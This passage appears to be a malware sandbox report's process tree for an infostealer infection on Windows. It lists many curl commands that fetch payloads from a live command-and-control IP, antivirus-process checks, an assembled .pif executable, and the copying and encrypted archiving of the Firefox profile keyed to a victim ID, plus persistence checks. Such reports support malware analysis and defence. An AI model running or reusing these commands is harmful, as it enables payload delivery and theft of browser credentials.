        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gokrs" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3132
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gokrs" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4008
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\esyyz" "178.215.224.74/v10/ukyh.php?jspo=5"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1892
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\esyyz" "178.215.224.74/v10/ukyh.php?jspo=5"
        6⤵
        
        PID:1396
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vaxiv" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:932
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vaxiv" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3896
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bznyh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1568
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bznyh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3080
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ppkaj" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
        5⤵
        
        PID:4860
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ppkaj" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
        6⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iyztn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2128
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\iyztn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ofzwq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3644
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ofzwq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1212
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dnfmn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3864
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dnfmn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
        6⤵
        
        PID:4760
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
        5⤵
        
        PID:4884
      - C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe
        
        azvw.exe -o xhwq.zip
        6⤵
        Executes dropped EXE
        
        PID:4732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tamnk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2768
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tamnk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:916
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hxetq" "178.215.224.74/v10/ukyh.php?jspo=31"
        5⤵
        
        PID:4512
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hxetq" "178.215.224.74/v10/ukyh.php?jspo=31"
        6⤵
        
        PID:4644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&1
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:3880
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /C:"OS Name"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nhfeg" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2332
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nhfeg" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1588
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\juglw" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2352
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\juglw" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3480
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nfgrz" "178.215.224.74/v10/ukyh.php?jspo=7"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4328
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nfgrz" "178.215.224.74/v10/ukyh.php?jspo=7"
        6⤵
        
        PID:4576
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sxnui" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4852
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sxnui" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4628
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ukwiz" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
        5⤵
        
        PID:2080
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ukwiz" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
        6⤵
        
        PID:3536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nwovp" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2348
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nwovp" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yhrnk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3896
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\yhrnk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4392
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zbnpt" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
        5⤵
        
        PID:4076
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zbnpt" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
        6⤵
        
        PID:5040
    - - C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe
        
        "C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3612
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
        6⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3820
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        7⤵
        
        PID:3496
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 303482
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4092
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "OVERTOOLBARALOTNHL" Weeks
        7⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f
        7⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\303482\Either.pif
        
        Either.pif f
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1808
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zjrum" "178.215.224.252/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\zjrum" "178.215.224.252/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\auujj" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:748
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\auujj" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qdaxr" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qdaxr" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\crobd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
        8⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\crobd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
        9⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3536
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe
        
        azvw.exe -o qyup.zip
        9⤵
        Executes dropped EXE
        
        PID:4872
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jyvof" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jyvof" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:848
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xdfnk" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:1216
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xdfnk" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mvfyx" "178.215.224.74/v10/ukyh.php?jspo=8"
        8⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mvfyx" "178.215.224.74/v10/ukyh.php?jspo=8"
        9⤵
        
        PID:3200
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\capcb" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:208
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\capcb" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kzocg" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=9D285DD33A798DB434A97C25125FCD"
        8⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kzocg" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=9D285DD33A798DB434A97C25125FCD"
        9⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bbjjt" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:792
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bbjjt" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jzqvk" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1588
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jzqvk" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1460
        
        C:\Windows\SysWOW64\Robocopy.exe
        
        robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
        9⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\glvab" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\glvab" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\9D285DD33A798DB434A97C25125FCD_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        8⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\9D285DD33A798DB434A97C25125FCD_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kiext" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kiext" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wbufz" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:748
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wbufz" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dhzai" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=c4887c118a23a46a60cd4882bf6742a8*6&jwvs=9D285DD33A798DB434A97C25125FCD"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3700
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dhzai" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=c4887c118a23a46a60cd4882bf6742a8*6&jwvs=9D285DD33A798DB434A97C25125FCD"
        9⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        8⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vlfig" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1904
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vlfig" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:1888
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nscwa" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=9D285DD33A798DB434A97C25125FCD&bsxa=1"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4860
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\nscwa" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=9D285DD33A798DB434A97C25125FCD&bsxa=1"
        9⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oarhy" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4768
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oarhy" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\edkou" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\edkou" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hjwmj" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=880a92ca8d717adf390668ad9ffc390b*2&jwvs=9D285DD33A798DB434A97C25125FCD"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4456
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hjwmj" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=880a92ca8d717adf390668ad9ffc390b*2&jwvs=9D285DD33A798DB434A97C25125FCD"
        9⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\styne" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3560
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\styne" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:792
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\spuwj" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=9D285DD33A798DB434A97C25125FCD"
        8⤵
        
        PID:1204
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\spuwj" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=9D285DD33A798DB434A97C25125FCD"
        9⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hecoj" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hecoj" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:932
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\leijq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:920
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\leijq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1064
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ckgjy" "178.215.224.74/v10/ukyh.php?gi"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3464
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ckgjy" "178.215.224.74/v10/ukyh.php?gi"
        6⤵
        
        PID:3796
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ypnyo" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1616
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ypnyo" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\myyps" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3444
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\myyps" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fldti" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=9D285DD33A798DB434A97C25125FCD"
        5⤵
        
        PID:3624
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fldti" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=9D285DD33A798DB434A97C25125FCD"
        6⤵
        
        PID:1204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qzbtx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3164
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qzbtx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3480
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vdoxj" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9D285DD33A798DB434A97C25125FCD&vprl=2"
        5⤵
        
        PID:1452
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vdoxj" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=9D285DD33A798DB434A97C25125FCD&vprl=2"
        6⤵
        
        PID:3536
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:5056
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:2128
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4116
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1536
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2984
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sxasw" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2360
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sxasw" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:796
    - - C:\Windows\SysWOW64\cmd.exe
        
